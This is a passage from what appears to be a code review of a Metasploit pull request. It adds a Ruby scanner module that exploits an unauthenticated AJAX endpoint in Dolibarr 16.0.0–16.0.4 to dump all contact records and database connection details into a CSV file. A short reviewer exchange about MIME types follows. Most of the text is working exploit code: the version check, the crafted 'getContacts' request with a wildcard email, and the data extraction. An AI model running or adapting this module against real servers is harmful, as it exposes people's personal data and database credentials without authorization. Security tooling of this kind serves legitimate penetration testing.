modules/auxiliary/scanner/http/dolibarr_16_contact_dump.rb

```diff
@@ -0,0 +1,140 @@
+        ]
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'Path to Dolibarr instance', '/'])
+
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return Exploit::CheckCode::Unknown('Connection failed') unless res
+    return Exploit::CheckCode::Safe unless res.code == 200
+
+    version = res.body.scan(/Dolibarr ([\d.]+-*[a-zA-Z]*)/).flatten.first
+
+    if Rex::Version.new(version).between?(Rex::Version.new('16.0.0'), Rex::Version.new('16.0.4'))
+      print_good("Detected vulnerable Dolibarr version: #{version}")
+      return Exploit::CheckCode::Appears
+    elsif version.blank?
+      print_warning('Dolibarr version not found - proceeding anyway...')
+      return Exploit::CheckCode::Detected
+    else
+      print_warning("Detected apparently non-vulnerable Dolibarr version: #{version} - proceeding anyway...")
+      return Exploit::CheckCode::Detected
+    end
+  end
+
+  def exploit(ip)
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/public/ticket/ajax/ajax.php'),
+      'vars_get' => {
+        'action' => 'getContacts',
+        'email' => '%'
+      }
+    }, 90, true)
+
+    res_json_document = res.get_json_document['contacts']
+
+    if res && res.code != 200
+      fail_with(Failure::UnexpectedReply, "Exploit response code: #{res.code}")
+    elsif res_json_document.nil?
+      fail_with(Failure::UnexpectedReply, 'Dolibarr database empty')
+    end
+
+    begin
+      print_good("Database type: #{res_json_document[0]['db']['type']}")
+      print_good("Database name: #{res_json_document[0]['db']['database_name']}")
+      print_good("Database user: #{res_json_document[0]['db']['database_user']}")
+      print_good("Database host: #{res_json_document[0]['db']['database_host']}")
+      print_good("Database port: #{res_json_document[0]['db']['database_port']}")
+    end
+
+    contact_fields = res.get_json_document['contacts'][0].keys
+    contact_fields.delete('db') # We do not want this in the csv
+
+    contact_entry_data = []
+
+    nbr_contact = res_json_document.length.to_i
+
+    print_good("Found #{nbr_contact} contacts.")
+
+    csv_string = CSV.generate do |csv| # Loop to write into csv
+      csv << contact_fields
+      nbr_contact.times do |num| # Loop on every contact
+        contact_fields.each do |element|
+          if res_json_document[num][element.to_s].is_a?(String) || res_json_document[num][element.to_s].is_a?(Int)
+            contact_entry_data << res_json_document[num][element.to_s].to_s.gsub("\r\n", ' ')
+          end
+        rescue StandardError
+          contact_entry_data << ' '
+        end
+        csv << contact_entry_data
+        contact_entry_data.clear
+      end
+    end
+
+    path = store_loot(
+      'dolibarr',
+      'application/CSV',
```

Comment:
MIME types are typically all lowercase so `application/csv` or `application/json` if you end up going that route.

Reply:
Ok thanks for your feedback ! Would it be fine to output both CSV and prettified JSON file with the store loot method? Or would you prefer a switch in the option to enable CSV output if desired?